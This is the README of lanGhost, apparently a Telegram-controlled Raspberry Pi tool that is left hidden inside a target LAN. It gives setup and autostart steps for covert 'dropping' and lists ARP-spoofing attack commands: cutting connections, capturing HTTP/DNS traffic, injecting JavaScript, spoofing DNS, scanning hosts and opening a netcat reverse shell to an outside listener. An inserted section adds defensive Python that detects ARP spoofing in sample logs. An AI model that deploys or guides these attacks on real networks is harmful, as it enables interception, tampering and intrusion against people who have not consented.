lanGhost is designed for the Raspberry Pi (Raspbian / Kali for the RPi). Running it on other/desktop distributions may cause problems and will probably not work.
You will need a Raspberry Pi with a fresh Raspbian/Kali on the SD card, because you don't want anything else running in the background.
Boot the Pi, get an SSH session (or connect a monitor and keyboard), and enter the following commands:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
While running the setup script, read the questions/messages!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choice to @BotFather, you will receive
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chance to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
Using lanGhost on networks larger than /24 is not recommended, because the scan will take too long.
lanGhost is not quiet. Anyone monitoring the traffic can see the ARP packets!
If you chose yes at step 4/4 (autostart), the Pi is fully set up for dropping. lanGhost should start on boot and message you on Telegram: lanGhost started!
Make sure to try it in a lab first and test whether lanGhost responds to your messages!
If you have everything set up, you can connect it to the target network simply by plugging an Ethernet cable into the Pi and powering it over micro USB, and you are good to go!
(lanGhost also works over WiFi, but you will need to set up wpa_supplicant to connect to the network automatically.)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
You can start an attack with one of the following commands: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
After you have one or more attacks running, you can use the /attacks command to get a list with the ATTACK-IDs.
To stop an attack, type /stop [ATTACK-ID].
/reversesh only establishes an unencrypted netcat TCP connection, and anyone monitoring can see all of the traffic! Use it only for emergency fixes or, where necessary, to set up an encrypted reverse connection.
The /reversesh command is for getting a reverse shell on the Pi when it cannot be reached from outside.
To use the /reversesh command, you need a server listening for the shell.
Netcat command to start the listener on your server:
$ nc -l 0.0.0.0 [PORT]
Telegram command:
/reversesh [IP-of-your-listening-server] [PORT]
/kill - Stops the target's internet connection.
/mitm - Captures HTTP and DNS traffic from the target and sends it to you in text messages.
/replaceimg - Replaces the target's HTTP images with a picture you send to the bot.
/injectjs - Injects JavaScript into every HTTP HTML response of the target. You need to host the JS file on a server and pass its URL as the argument.
/spoofdns - Spoofs the target's DNS responses.
All attacks use ARP spoofing!
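That last sentence is the defender's hook: every lanGhost attack begins with ARP replies that a passive monitor on the LAN can see. As an added example (not part of lanGhost), the Python below parses constructed tcpdump-style ARP reply lines and flags the two signatures of ARP spoofing: an IP whose MAC suddenly changes (the gateway case reported separately) and a single MAC that claims more than one IP. The sample log, the addresses in it and the gateway_ip parameter are all assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in "tcpdump -n arp" style; not captured from a real network.
# b8:27:eb is the Raspberry Pi Foundation OUI, so a MAC like this suddenly
# claiming the gateway and a host is exactly what a dropped Pi would look like.
SAMPLE_ARP_LOG = """\
12:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
12:00:01.100 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
12:00:05.000 ARP, Reply 192.168.1.1 is-at b8:27:eb:aa:bb:cc, length 28
12:00:05.050 ARP, Reply 192.168.1.20 is-at b8:27:eb:aa:bb:cc, length 28
12:00:09.000 ARP, Reply 192.168.1.1 is-at b8:27:eb:aa:bb:cc, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>[\d.]+) is-at (?P<mac>[0-9a-f:]{17})", re.I
)


def detect_arp_spoof(log_text, gateway_ip=None):
    """Return a list of (timestamp, kind, detail) alerts from ARP reply lines.

    kind is one of:
      'gateway'      - the gateway's MAC changed (most damaging case on a LAN)
      'mac-changed'  - any other IP previously bound to one MAC is now claimed by another
      'mac-multi-ip' - one MAC now claims a second IP (a host sitting in the middle)
    """
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for line in log_text.splitlines():
        m = ARP_REPLY.match(line)
        if not m:
            continue  # ignore requests and non-ARP noise
        ts, ip, mac = m["ts"], m["ip"], m["mac"].lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            kind = "gateway" if ip == gateway_ip else "mac-changed"
            alerts.append((ts, kind, f"{ip}: {previous} -> {mac}"))
        ip_to_mac[ip] = mac
        # Alert only when the MAC gains a *new* IP, not on every repeated reply.
        if mac_to_ips[mac] and ip not in mac_to_ips[mac]:
            alerts.append((ts, "mac-multi-ip",
                           f"{mac} claims {sorted(mac_to_ips[mac] | {ip})}"))
        mac_to_ips[mac].add(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_LOG, gateway_ip="192.168.1.1"):
        print(*alert)
```

The same logic runs unchanged over a live `tcpdump -n -l arp` pipe; in practice a static ARP entry for the gateway, or dynamic ARP inspection on a managed switch, is the mitigation the alert should point at.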
/scan - Scans the local network and returns the hosts that are online. Uses an nmap -sn scan to discover hosts.
/scanip - Scans an IP address for open ports and other information. Uses an nmap -sS scan.
Every time a new device connects to or leaves the network, you will receive a message.
Copyright (C) 2018 David Schütz. Some rights reserved.
lanGhost is licensed under the terms of the MIT License, with all the clarifications stated in the LICENSE file. You can also reach me by email at Xdavid {at} ProtonMail {dot} com.